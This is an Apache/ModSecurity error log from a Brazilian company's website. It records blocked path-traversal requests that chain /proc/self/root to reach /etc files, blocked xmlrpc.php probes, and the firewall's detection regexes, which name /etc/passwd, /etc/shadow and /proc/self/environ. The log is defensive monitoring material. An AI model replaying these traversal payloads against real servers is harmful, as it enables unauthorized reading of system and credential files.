[Fri Mar 20 10:31:29.059175 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.243.128:54004] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1MMTJ3M9BSuKP7CAZCGgAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:31:30.970783 2026] [:error] [pid 21219:tid 140411590858496] [client 57.141.18.14:43758] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1MMvXLqtnMIWvjpaK6NQAAApI"]
[Fri Mar 20 10:31:45.923355 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.243.128:46590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1MQRCii7xarUs8iHaKFAAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:31:48.172015 2026] [:error] [pid 11642:tid 140411683178240] [client 57.141.18.115:44332] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1MQ7ninkcc-iUj5Ap9UwAAA4c"]
[Fri Mar 20 10:31:48.213525 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.243.128:55062] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1MQ_qxLDW4GITHUkQJbgAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:31:52.145473 2026] [mime_magic:error] [pid 7235:tid 140411632822016] (70014)End of file found: [client 74.7.243.128:54232] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run
[Fri Mar 20 10:32:06.692712 2026] [:error] [pid 9818:tid 140411725141760] [client 57.141.18.100:45034] [client 57.141.18.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/cron.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1MVV1pVZ5mVmJwsFNPcgAAAEI"]
[Fri Mar 20 10:32:13.955277 2026] [:error] [pid 11642:tid 140411741927168] [client 57.141.18.92:45472] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1MXbninkcc-iUj5Ap9YgAAA4A"]
[Fri Mar 20 10:32:16.927462 2026] [:error] [pid 11642:tid 140411725141760] [client 57.141.18.19:45582] [client 57.141.18.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1MYLninkcc-iUj5Ap9ZAAAA4I"]
[Fri Mar 20 10:32:42.122320 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:44280] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1MeuoXxyEfFpUF8f-gQwAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:32:43.163401 2026] [:error] [pid 26799:tid 140411649607424] [client 57.141.18.26:46408] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Me9a6ubjKNq_cu4b5kwAAA0s"]
[Fri Mar 20 10:32:43.486976 2026] [:error] [pid 7235:tid 140411616036608] [client 74.7.241.31:44288] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Me_qxLDW4GITHUkQJowAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:32:44.782763 2026] [:error] [pid 9818:tid 140411666392832] [client 74.7.241.31:44302] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1MfF1pVZ5mVmJwsFNPjQAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:32:45.913631 2026] [:error] [pid 7893:tid 140411590858496] [client 57.141.18.57:46570] [client 57.141.18.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1MfRCii7xarUs8iHaKRgAAAhI"]
[Fri Mar 20 10:32:48.999053 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.241.31:44314] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1MgOoXxyEfFpUF8f-gSgAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:32:50.949024 2026] [:error] [pid 15826:tid 140411582465792] [client 57.141.18.5:46890] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1MguoXxyEfFpUF8f-gTQAAAVM"]
[Fri Mar 20 10:32:51.618871 2026] [:error] [pid 31215:tid 140411658000128] [client 57.141.18.27:46910] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1MgwF0L0L-SsrnPo6JLgAAAso"]
[Fri Mar 20 10:32:53.903689 2026] [:error] [pid 10189:tid 140411599251200] [client 74.7.241.31:55246] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1MhDJ3M9BSuKP7CAZCdAAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:32:57.624141 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.241.31:55258] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1MifqxLDW4GITHUkQJsQAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:32:58.635022 2026] [access_compat:error] [pid 11167:tid 140411699963648] [client 195.123.216.134:54242] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:32:59.008340 2026] [:error] [pid 11167:tid 140411641214720] [client 74.7.241.31:35232] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Mi_HIg5MgXLBnicMV-gAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:32:59.807929 2026] [access_compat:error] [pid 7893:tid 140411582465792] [client 51.210.111.7:33625] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:33:01.347217 2026] [:error] [pid 11642:tid 140411599251200] [client 74.7.241.31:35240] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Mjbninkcc-iUj5Ap9gAAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:33:02.362756 2026] [access_compat:error] [pid 15826:tid 140411624429312] [client 154.47.20.216:57433] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:33:02.535478 2026] [:error] [pid 11167:tid 140411599251200] [client 57.141.18.20:47284] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1MjvHIg5MgXLBnicMV_QAAAdE"]
[Fri Mar 20 10:33:03.708368 2026] [access_compat:error] [pid 31215:tid 140411582465792] [client 45.94.31.68:51052] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:33:13.083038 2026] [:error] [pid 10189:tid 140411641214720] [client 74.7.241.31:35252] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1MmTJ3M9BSuKP7CAZCiwAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:33:14.957176 2026] [access_compat:error] [pid 7893:tid 140411632822016] [client 195.86.38.6:28942] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:33:14.963336 2026] [:error] [pid 21219:tid 140411725141760] [client 74.7.241.31:41426] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1MmvXLqtnMIWvjpaK6tAAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:33:16.768544 2026] [:error] [pid 31215:tid 140411725141760] [client 57.141.18.38:47936] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1MnAF0L0L-SsrnPo6JSwAAAsI"]
[Fri Mar 20 10:33:17.552843 2026] [:error] [pid 7235:tid 140411658000128] [client 74.7.241.31:41434] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1MnfqxLDW4GITHUkQJugAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
